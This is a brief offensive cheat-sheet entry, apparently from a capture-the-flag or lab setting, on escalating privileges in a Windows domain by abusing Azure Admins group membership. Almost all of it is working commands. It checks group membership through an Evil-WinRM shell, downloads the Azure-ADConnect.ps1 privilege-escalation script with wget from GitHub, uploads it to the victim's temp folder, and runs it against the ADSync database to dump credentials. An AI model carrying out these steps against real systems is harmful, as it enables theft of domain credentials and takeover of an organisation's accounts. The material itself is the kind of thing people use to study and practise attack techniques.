Azure Admins

Azure Admins (Domain Privilege Escalation)

Detect

*Evil-WinRM* PS C:\Users\mhope> net user mhope | findstr "Group"                                                           

Global Group memberships      *Azure Admins

Abuse

Azure-ADConnect.ps1

# attacker
wget -q "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"

# victim
*Evil-WinRM* PS C:\Users\mhope> cd $env:TEMP
*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> upload Azure-ADConnect.ps1

Dump Credentials

# victim
*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> Import-Module .\Azure-ADConnect.ps1
*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> Azure-ADConnect -server 10.129.179.26 -db ADSync